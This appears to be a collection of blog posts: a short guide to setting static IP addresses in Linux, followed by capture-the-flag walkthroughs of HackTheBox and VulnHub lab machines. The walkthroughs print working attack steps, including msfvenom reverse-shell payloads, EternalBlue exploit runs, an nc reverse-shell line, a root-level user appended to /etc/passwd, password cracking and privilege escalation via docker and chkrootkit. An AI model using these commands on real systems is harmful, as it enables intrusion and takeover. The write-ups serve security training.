Task: DNS: 192.168.56.1 Gateway: 192.168.56.1 Netmask: 255.255.255.0 IPv4: 192.168.56.12
sudo vim /etc/netplan/00-installer-config.yaml
# This is the network config written by 'Samdup' network: version: 2 renderer: networkd ethernets: enp0s3: dhcp4: true enp0s8: dhcp4: no dhcp6: no addresses: [192.168.56.12/24,] gateway4: 192.168.56.1 nameservers: addresses: [8.8.8.8, 8.8.4.4
sudo netplan apply
Although there are many benefits of assigning static IP address to a machine, it really helps me to stay organized and can monitor my machines with more convenience. Besides, it became a habit that whenever I have to access machines from Vmware or VirtualBox, I like to SSH to it from my host machine. So, in this article I will share how to set a static IP address to your machine without using any Graphical Tools (because 99.9% of the servers which I had worked have no GUI, moreover I enjoy the power it caters).
Task:
Assign a Static IP address using following information (you can alter it based on your Host-only Network IP address)
IP address: 192.168.56.11
Default Gateway: 192.168.56.1
DNS: 192.168.56.1
Netmask: 255:255:255:0
I ran a ifconfig on my machine. You can clearly see that I have two Network Interface (ifname) slots and one is empty (i.e. ens192) (By the way, you can click on the image to magnify the view)
Command:
First, let’s run
nmcli c s
nmcli is the networking management tool or the package we are going to use (although nmtui is a great option but it may not be available on all the server)
c is the shorthand of connection
s is to show
To know the interface name and other details…
Yes. the above command did help us to confirm our understanding which we inferred from the ifconfig result.
Here we go
nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses 192.168.56.11/24 ipv4.dns 192.168.56.1 ipv4.method manual
Narration:
Although you can understand what each flag does by simple doing a man nmcli , let me do a little explanation just to have a grab of the concept for myself.
We are adding (add) a new connection name (con-name) called lab on the network interface (ifname) ens192, which connects automatically with IP address 192.168.56.11/24 (and netmask 255.255.255.0) using nmcli package.
Method manual means it is a static IP assignment. Until we explicitly change the IP address, it won’t get like how we experience with our home devices (which are on DHCP).
nmcli connection lab up
It appears that the new connection is ready despite we don’t run the aforementioned command, however, I like to run it (because I am afraid it may not be the case in an exam environment or real server that you will have to manage).
To verify the result…
ifconfig
We got IP address and Netmask correct
cat /etc/resolv.conf
We got DNS correct
However, we did get the Gateway configured.
route -n
It is indeed bless in disguise because we got the opportunity to learn how to edit the value in case we need in the future. I know the command is something to do with edit so, let me know quickly run a man nmcli
The above screenshot is nothing but the output of man command.
Method 1
nmcli connection edit type ethernet con-name lab
It will prompt you an interactive shell. You have to choose set option
ipv4.gateway 192.168.56.1
then press q to exit and save.
Method 2 (Referred from this site)
I really like this command more. It’s simple and easy to get the jobs done
nmcli connection modify lab ipv4.gateway 192.168.56.1
To verify:
route -n
Combined output result is in the screenshot
Finally we have to reboot the machine and check whether it is working fine or not.
Yes, everything is working perfect and just to confirm you about the Gateway, I enclosed the result in here.
route -n
Today I am going to take down a machine called ‘Blue’. It’s a window 7 based machine. I didn’t expect that I could pwn the machine quite easily… Anyway, here is my walkthrough of it. By the way, it is not necessary mean that it is the sole way to compromise the machine. Ok enough said, let’s do some work…
nmap -sC -sV 10.10.10.40 -o nmap1.log
PORT STATE SERVICE VERSION [6/13] 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
nmap --script smb-vuln* -o smb-vuln.log 10.10.10.40
Nmap scan report for 10.10.10.40 Host is up (0.43s latency).
Not shown: 991 closed ports PORT STATE SERVICE
135/tcp open msrpc 139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
After googling, I find this repository has everything you need for MS17-010 (aka eternal blue)
git clone https://github.com/helviojunior/MS17-010.git cd MS17-010
We need to develop a simple exploit (which could create reverse connection back from Window 7 machine to our Kali Linux machine). Remember, we are never going to depend on Meterpreter shell which is not allowed in the exam therefore, in lieu of aforementioned shell, I am going to use the shell_reverse_tcp shell.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f exe > blue.exe
I don’t think you require me to explain what those option does because I have done it in my previous post. It is here.
Although MS17-010 contains the exploit but I didn’t use that, instead I did manually went to search an exploit from exploit-db
searchsploit MS17-010
cp /usr/share/exploitdb/exploits/windows/remote/42315.py .
Then we need to modify the exploit code. (I have highlighted the line where it is required to modify)
You need to place the guest username (perhaps you can see either from nmap result or following command can help you to understand there is a guest user). By the way, there is a two way to fill the guest user. One is conventional way to place username as guest and other way is simply filling the place by // (yes two forward slashes in between the quote).
Once modification is done then follow the following steps..
I used to divide the Terminal by using tmux and, in one shell you need to wait the reverse connection from the Window Machine.
nc -lvp 1234
And on another shell
python 42315.py 10.10.10.40
Once you are successful, you will get the system32 prompt like the screenshot below..
User flag (remember type in window command is same as cat in Linux – I know this claim is too much but let us be like this for time being)
Finally the root flag…
Hello guys,
Today I am going to take down one simple box from Hack The Box. Recently I purchased a VIP lab access. By the way, the machine name is called Legacy and it’s a window machine.
This is my first write-up of machines from that lab.
Since we already have the machine IP address (it’s shown in the web portal), let’s check what ports are open and what services are running..
Overview: Machine IP: 10.10.10.4 Kali Linux : 10.10.14.10 Target: 1. To get the user flag 2. To get the root flag
Information Gathering Phase:
nmap -sC -sV 10.10.10.4 -Pn
Nmap scan report for 10.10.10.4 PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
From the above result, we can conclude that the target machine is running Window XP and, it has port 139 and 445 opened. Besides, it is running Samba server.
If you want to know more, you can also perform the above command with -v option. (However, the screenshot attached was the result of command without the -v option)
nmap -sC -sV -v -p139,445 10.10.10.4 -o nmap.log -Pn
Based on the above result, we are certain that this Samba version is vulnerable. However, the following NSE script (nmap script) can help us to get a better vulnerability detail and, it will also recommend related exploits if it has any.
nmap --script smb-vuln* -o nmap_smb_vul.log -Pn 10.10.10.4
PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds Host script results: | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
You can clearly see that it has suggested two exploits however, since the first exploit is having some issue (which I colored red) therefore, I am going to use the second exploit. (Note: I must share with you that it is not absolute approach, because sometimes a minor changes in the exploit might work, so try to fix the issues of the first exploit if time permits you).
Although I found many exploits regarding MS17-010, I am going to do it without using Metasploit (which is a powerful automating framework or tool). So let’s do some shopping through online.
We are going to clone a GitHub link… (there will be many GitHub account having the exploit details of MS17-010. But, we need one with “send script” (send_and_execute.py) to send the exploit from our Host Machine (Kali Linux) to that Remote Machine(Window Machine). Since many GitHub repository doesn’t have the script send_and_execute.py therefore I am emphasizing about it. Perhaps if you read further you might get to know the importance of it)
git clone https://github.com/helviojunior/MS17-010 cd MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=1234 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
I was little skeptical using msfvenom at the beginning as in the OSCP exam, we are allowed to use Metasploit only twice (and my plan is not to use any). Nevertheless, after reading couple of blogs of senior OSCPians, I understood we can use msfvenom and they discouraged to use Meterpreter.
-p payload LHOST localhost LPORT Local Port I might need to explain a little regarding EXITFUNC=thread - This EXITFUNC option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. - thread method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit) - To know more, kindly visit this link -f output format -a architecture -o output file and path
If you have observed carefully, you might have noticed that our exploit MS17-010.exe (is using payload windows/shell_reverse_tcp) will provide us a reverse connection to our Kali Linux Machine (or Local Host) on LPORT 1234.
Therefore, I will wait a reverse connection to my LHOST at LPORT 1234.
nc -lvp 1234
And on another Terminal (remember to cd ms17-010 folder if you are freshly opening a Terminal), perform the following command. (By the way, I highly recommend you to use tmux tool to split the terminal to enhance your productivity)
python send_and_execute.py 10.10.10.4 ms17-010.exe
Yes, if you are successful; on your terminal (which was listening at port 1234 will get the reverse connection), you will see like the following screenshot. (Focus on the highlight area)
I will not bore you with my English (Tibetish lol), so I have attached the following steps in screenshot.
That’s all guys … See you in the next post 🙂
Target Machine IP Address: 192.168.56.46 My Machine IP Address: 192.168.56.20
Boot to Root
THIS IS A MACHINE FOR COMPLETE BEGINNER , GET THE FLAG AND SHARE IN THE TELEGRAM GROUP (GROUP LINK WILL BE IN FLAG.TXT) DHCP : ENABLED IP : AUTO ASSIGN
You can download the machine from here.
************************************
Information Gathering & Scanning Process:
sudo arp-scan --interface=eth0 192.168.56.1/24
nmap -sC -sV -p- 192.168.56.46 -o nmap.log
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian))
I checked source code, exiftool on image but didn’t get a good result, so I will not write those processes here (afraid it may bog you down with rabbit holes.) However, something interesting is showing at robots.txt
Note: Don’t just stop there, I missed it once.. look at the line number, something must be at the bottom
aVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU1nQUFBRElDQVlBQUFDdFdLNmVBQUFIaGtsRVFWUjRuTzJad1k0c09RZ0U1LzkvK3UyMU5TdTdCd3JTaVN0QzhoR2M0SXBMOTg4L0FGanljem9BZ0RNSUFyQUJRUUEySUFqQUJnUUIySUFnQUJzUUJHQURnZ0JzUUJDQURRZ0NzQUZCQURhRUJmbjUrUmwvbk9aTFAxeER6K3g5VTA1cWJoWjFkcjRzSFQyejkwMDVxYmxaMU5uNXNuVDB6TjQzNWFUbVpsRm41OHZTMFRONzM1U1RtcHRGblowdlMwZlA3SDFUVG1wdUZuVjJ2aXdkUGJQM1RUbXB1Vm5VMmZteWRQVE0zamZscE9hdVhKUVRUamxkSHZ0YmxvNDZOUWp5UjV4eUlvZ09CUGtqVGprUlJBZUMvQkdubkFpaUEwSCtpRk5PQk5HQklIL0VLU2VDNkVDUVArS1VFMEYwakJWRS9aSGM4SEhkUHZ1RWQwZVF3N003MWFtelRIaDNCRGs4dTFPZE9zdUVkMGVRdzdNNzFhbXpUSGgzQkRrOHUxT2RPc3VFZDBlUXc3TTcxYW16VEhoM0JEazh1MU9kT3N1RWQwZVFJcWJNNENUcmhKMGhTQkZUWmtDUUdBaFN4SlFaRUNRR2doUXhaUVlFaVlFZ1JVeVpBVUZpSUVnUlUyWkFrQmdJVXNTVUdSQWtCb0lVMFRHZjAxN2UrdTRJVXNScEtSRGtXYzVsdjNEQlN4ZjFqZE5TSU1pem5NdCs0WUtYTHVvYnA2VkFrR2M1bC8zQ0JTOWQxRGRPUzRFZ3ozSXUrNFVMWHJxb2I1eVdBa0dlNVZ6MkN4ZThkRkhmT0MwRmdqekx1ZXdYTGhCL2VGazZjcm84Mm9rc2IzMTNCQkgwdkNITFc5OGRRUVE5YjhqeTFuZEhFRUhQRzdLODlkMFJSTkR6aGl4dmZYY0VFZlM4SWN0YjN4MUJCRDF2eVBMV2R5OFZaTXJwV1BDYjY2YWNEQWdTbUkrNjJTY0RnZ1RtbzI3MnlZQWdnZm1vbTMweUlFaGdQdXBtbnd3SUVwaVB1dGtuQTRJRTVxTnU5c25nOVNPMkFjcmxQN212SXd2OEg3YjVDd1NCVDlqbUx4QUVQbUdidjBBUStJUnQvZ0pCNEJPMitRc0VnVS9ZNWk4UUJENlIvUS9pMURPTFU4OHBkV3FxY3lKSTBlenFubFBxMUNBSWdveXFVNE1nQ0RLcVRnMkNJTWlvT2pVSWdpQ2o2dFFnQ0lLTXFsTnpYQkExYnhZeWk5TU1UbStVeWwvZXNSZ0VpZU0wZzlNYnBmS1hkeXdHUWVJNHplRDBScW44NVIyTFFaQTRUak00dlZFcWYzbkhZaEFranRNTVRtK1V5bC9lc1JnRWllTTBnOU1icGZLWGR5d0dRZUk0emVEMFJxbjhwYzJTUTcxWkFxZlpwd2pTVWJmc2w2cEtoRU1RajV3SUVzeWZxa3FFUXhDUG5BZ1N6SitxU29SREVJK2NDQkxNbjZwS2hFTVFqNXdJRXN5ZnFrcUVReENQbkFnU3pKK3FTb1JERUkrY0NCTE1uNm9xRHVleWpLNmVhcHdFNmNpWjdabkttS29xRHVleWpLNmVhaEFFUVI3VnFYdXFRUkFFZVZTbjdxa0dRUkRrVVoyNnB4b0VRWkJIZGVxZWFoQUVRUjdWcVh1cVFaQ0JncWcvNWpmZjEvRngzUzdXOHE2cHdia1BRUkNFK3hDa01HZnFycW5CdVE5QkVJVDdFS1F3WitxdXFjRzVEMEVRaFBzUXBEQm42cTdLY0ZtY0hzYnBvM1RLMlpGbEFnaHlPQXVDZUlNZ2g3TWdpRGNJY2pnTGduaURJSWV6SUlnM0NISTRDNEo0Z3lDSHN5Q0lONldDM1A0d1RvL3RKTEo2TDhvc0NGSjBueG9FUVpDMkxCMzNxVUVRQkduTDBuR2ZHZ1JCa0xZc0hmZXBRUkFFYWN2U2NaOGFCRUdRdGl3ZDk2bEJrSUdDZE5TcGUyYnZVMzk0Nm5mb3lPazAzN0pmdU1Ba2VGZlA3SDFPSDE3MlBuVk9wL21XL2NJRkpzRzdlbWJ2Yy9yd3N2ZXBjenJOdCt3WExqQUozdFV6ZTUvVGg1ZTlUNTNUYWI1bHYzQ0JTZkN1bnRuN25ENjg3SDNxbkU3ekxmdUZDMHlDZC9YTTN1ZjA0V1h2VStkMG1tL1pMMXhnRXJ5clovWStwdzh2ZTU4NnA5Tjh5MzdoQXZHSGZzUHlPN0pNMmFkNlp3aGkrbWdkODkyd1R3UzU3RUU3WmtjUUJMbm1RVHRtUnhBRXVlWkJPMlpIRUFTNTVrRTdaa2NRQkxubVFUdG1SNUFYQ1hJNzZnKzJBN1dRSFZrNnhFcmxUMVZkRElKNFpFRVFVeERFSXd1Q21JSWdIbGtReEJRRThjaUNJS1lnaUVjV0JERUZRVHl5akJXa1kyRDFjV0xLQitUeXdYNERRUkFFUVlUM0ljaGhFS1FXQkVFUUJCSGVoeUNIUVpCYUVBUkJFRVI0SDRJY0JrRnFzUmJFaVk2Y04zek1UaCtzK28xUy9VNEg2QUpCRUFSQk5pQUlnaURJQmdSQkVBVFpnQ0FJZ2lBYkVBUkJFR1FEZ2lESUtFRnUrTGc2NW5QSzRuVFV1MTdlRlM0d2VqUjF6bzc1bkxJNEhmV3VsM2VGQzR3ZVRaMnpZejZuTEU1SHZldmxYZUVDbzBkVDUreVl6eW1MMDFIdmVubFh1TURvMGRRNU8rWnp5dUowMUx0ZTNoVXVNSG8wZGM2TytaeXlPQjMxcnBkM2hRdU1IazJkczJNK3B5eE9SNzNyNVYzaEFxTkhVK2QwMnN1VUxOTnpJb2h4M1ExWnB1ZEVFT082RzdKTXo0a2d4blUzWkptZUUwR002MjdJTWowbmdoalgzWkJsZWs0RU1hNjdJY3YwbkFoU3hKUVoxRDJuZkMvTEhKWExjQm9ZUVR4NlR2bGVsamtxbCtFME1JSjQ5Snp5dlN4elZDN0RhV0FFOGVnNTVYdFo1cWhjaHRQQUNPTFJjOHIzc3N4UnVReW5nUkhFbytlVTcyV1pvM0laVGdNamlFZlBLZC9MTWtmbE1weVk4bEVxSC9zSlRoODZnaFNBSUxVZ1NQT2kxQ0JJTFFqU3ZDZzFDRklMZ2pRdlNnMkMxSUlnell0U2d5QzFJRWp6b3RRZ1NDMElVckNvS1NjN245TmVzcHplZmNVTTJmbFMvU29EVERrZEMzYWF3U2tuZ2d3OEhRdDJtc0VwSjRJTVBCMExkcHJCS1NlQ0REd2RDM2Fhd1NrbmdndzhIUXQybXNFcEo0SU1QQjBMZHByQktlZnJCQUY0RXdnQ3NBRkJBRFlnQ01BR0JBSFlnQ0FBR3hBRVlBT0NBR3hBRUlBTkNBS3dBVUVBTmlBSXdBWUVBZGp3SHlVRnd2VnIwS3ZGQUFBQUFFbEZUa1N1UW1DQw==
Yes, this is base64. We need to decode it.
If you wonder why I did double decoding, you might understand it by doing it with single decoding. Because output of the base64 decoded message is another base64 decoded text, therefore, I did it twice.
The decoded file is actually a PNG file, do you see the PNG in the top of the screenshot?
I have redirected the output and named the file decoded.png
It is a QR Code. Now I need to do a little shopping. Find an online tool that could read the code and spit out the message if it has any… By the way, I tried my mobile QR reader and I already got the message, however, let’s do the usual way…
I am going to use this tool to decode the message: https://zxing.org/w/decode.jspx
Password:: topshellv
However, I did Scan with Nikto and Gobuster, both gave me some information, nevertheless, so far it appears to be another rabbit hole to me though 🙂
As you can see very well that directory redirects to somewhere (which are not known yet, I am planning to run a burp suite to look into it.)
In Nikto result, there is a link which intrigued me, nevertheless, I am not sure whether it is again a rabbit hole, however, let’s keep it in our note.
I must confess here that I was not able to get anything that could be of use. So, I had to peek other people’s writeup. The author of the writeup used another custom wordlist which is not there in the list of directory database which we use normally. Therefore, I think we really need to keep this in my that if a scanner can find nothing that doesn’t mean nothing is there.
Actually, I can add the bulma word in the dictionary and act as if I find the directory using the scanner but I don’t think that is the way.
Anyway, let’s proceed with the directory http://192.168.56.46/bulma/
I am impressed with this audio file because it contents Mores Code. (I don’t know how to read the Mores Code manually, however, we can find a tool for that)
Tools to decode mores audio file: Click Here.
We got username: trunks password: u$3r
If you run this command, you will get to know which (system) files you could write (or modify).
find / -writable -type d 2>/dev/null
There were so many, files that I could edit. I did a quick brush. However, the last file atracks me the most.
/etc/passwd
Let’s modify this file using the findings…
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd which means we added a user name Tom and the password is Password@973 su Tom cat root.txt
That’s it, guys… if you don’t like to enumerate manually you can use linpeas.sh tool to enumerate the box for you…
Additional Note:
I upload linpeas.sh to our target machine from my Kali Machine using SimpleHTTPServer (by the way, in order to save some time, I aliased the command with up).
git clone https://github.com/mkubecek/vmware-host-modules
cd vmware-host-modules
git checkout workstation-15.5.6
sudo make ; sudo make install
Target Machine IP Address: 192.168.56.41 My Machine IP Address: 192.168.56.20
Boot to Root
Your target is gain the Root access There is no any flag in this VMs Share root access with me twitter@cybersploit1 This works better with VirtualBox rather than VMware
You can download the machine from here.
************************************
Information Gathering & Scanning Process:
sudo arp-scan --interface=eth0 192.168.56.1/24
nmap -sC -sV -p- 192.168.56.41 -o nmap.log
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) 80/tcp open http Apache httpd 2.4.37 ((centos))
Let’s browse 192.168.56.41
Some strings are encrypted. Let’s check out the source code. (ctrl+u shortcut key)
Yes, this is a ROT47 encrypted message, I thought to write a script to do this however, let’s not waste time. Better google an online tool for this task. I used this one.
username: D92:=6?5C2 -> shailendra password: 4J36CDA=@:E-> cybersploit1
Since the target machine is running SSH service, let’s try that.
ssh shailendra@192.168.56.41
ls -lah
We got a hint.txt
The system is running docker.
Remember always, this will be our black book of magic (gtfobins.github.io/)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh However, in order to run this command, you need to provide the internet (at least in my case), else you might not able to download alpine/latest.
Finally, cybersploit2 is pwned!!
Target Machine IP Address: 192.168.56.42 My Machine IP Address: 192.168.56.20
THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FALGS AVAILABLE IN THIS VM. FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.
You can download the machine from here.
************************************
Information Gathering & Scanning Process:
sudo arp-scan --interface=eth0 192.168.56.1/24
nmap -sC -sV -p- 192.168.56.42 -o nmap.log
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 | http-ls: Volume / | SIZE TIME FILENAME | 3.0K 2020-07-07 16:36 save.zip
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdfThe zip file required a password to access it. I am not able to find anything which could be leveraged to use as password. Let’s crack it through brute force using rockyou.txt with fcrackzip tool.
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip 
password: manuelhttps://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
We were able to get some juicy information and I am not going to write here each file, however, I am sure you know well that shadow file is the hashed form of the password for the users. I think this may be enough.
We need to break the hash, so let’s use john for the task and take necessary hashes and make it in one form.
username: 296640a3b825115a47b68fc44501c828
echo "$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us." | > ../hash.txt
ssh 296640a3b825115a47b68fc44501c828@192.168.56.42
password: server
We need to bypass the rbash restriction. I have never used it however, I have seen this in blog and youtube vidoes by IPPSec.
If you want to know more about rbash bypass, you can read it from here.
From that pdf resources, I tried all the commands and it didn’t work. However, as I tried the following Advance Techniques part, it no longer gives me
ssh 296640a3b825115a47b68fc44501c828@192.168.56.42 -t "bash --noprofile"
Now we can see that it no longer showing us rbash restriction rather command not found which means, the binary or the command path needs to be fixed here.
What I tried was I echo the PATH of my Kali Machine and copied this path and set it to the target machine. Perhaps you might understand it better if you see this screenshot.
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/go/bin/:/root/go-workspace/bin
Ok, let’s download pspy on Kali Machine and they transfer that to out targetted machine. I use SimpleHTTPServer to do the work, of course, you can have your own method 🙂
Let’s do a searchexploit chkrootkit or search chkrootkit on google (it will show exploit-db which is GUI of searchsploit).
When we read the exploit steps (like how to configure and how to use it), it tells us this..
The steps are quite self-explanatory, however, what I did here is, I checked the location of the NC program in the target box and then let it run /bin/sh with port 1234, to reverse a connection to IP address 192.168.56.33 (My Kali Machine). Of course, as per the instruction we need to give execution permission to out executable file
Note: I checked the cron entry and I was not able to find any relevant information that whether update (which we have created) is running nor I found chkrootkit related. Interestingly when I check the process through pspy64, periodically /tmp/update is running. Therefore, we can leverage that to our purpose. By the way, this might be because when we run this program honeypot.decoy, it triggers the chkrootkit.
Exploit 1:
#!/bin/bash
echo 'root:tcert.net' | sudo chpasswd
save it as update (by the way, you have to use nano editor this time because if I am not wrong vi editor is not available)
chmod +s update (I sipped tea and look around) and then
su - root
password: tcert.net
Exploit 2: (It didn’t work for me. I need to dig little deeper)
echo "/usr/bin/nc -e /bin/sh 192.168.56.33:1234" > update chmod +x update
That’s all guys 🙂